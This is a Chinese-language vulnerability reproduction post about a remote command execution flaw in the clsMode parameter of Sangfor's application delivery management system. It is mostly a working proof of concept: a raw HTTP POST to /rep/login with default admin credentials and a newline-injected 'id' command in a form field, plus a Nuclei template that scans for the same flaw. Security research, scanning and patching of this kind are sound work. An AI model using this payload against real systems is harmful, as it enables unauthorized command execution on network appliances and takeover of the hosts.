【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

admin

139544
文章

114
评论

2023年10月17日08:28:15评论72 views字数 991阅读3分18秒阅读模式

漏洞概述

深信服AD作为专业的应用交付产品，能够为客户的应用发布提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。

深信服应用交付管理系统clsMode存在远程命令执行漏洞，攻击者可利用该漏洞执行系统命令。

【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

漏洞复现

POC:

POST /rep/login HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded userID=admin&userPsw=admin&page=login&log_type=report&index=index&clsMode=cls_mode_login%0Aid%0A

【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

NUCLEI POC

【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

id: sangfor-ad-clsmode-rce info:  name: 深信服应用交付管理系统clsMode远程命令执行漏洞  author: YGnight  severity: high  description: description  reference:    - https://  tags: tags requests:  - raw:      - |-        POST /rep/login HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0        Content-Length: 120        Accept-Encoding: gzip, deflate        Content-Type: application/x-www-form-urlencoded         userID=admin&userPsw=admin&page=login&log_type=report&index=index&clsMode=cls_mode_login%0Aid%0A     matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        words:          - 'suid'

原文始发于微信公众号（night安全）：【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞附POC

同步漏洞行动：朝鲜Lazarus APT组织针对韩国供应链发起攻击

Vulnhub-zico2靶机教学

使用 PowerShell 中的动态 API 解析绕过 AMSI

Sunder：旨在利用 BYOVD 漏洞的 Windows rootkit

浅谈常见edu漏洞，逻辑漏洞，越权，接管到getshell，小白如何快速找准漏洞

【云安全】k8s漏洞合集 | k8s安全攻防

Doppelganger项目 - 模仿灵魂，不留痕迹

SpEL表达式漏洞注入内存马

挖洞小记 | 记一次拿下某软柿子证书站过程！

渗透测试 FastJSON 是个延时炸弹？

发表评论

在线咨询

微信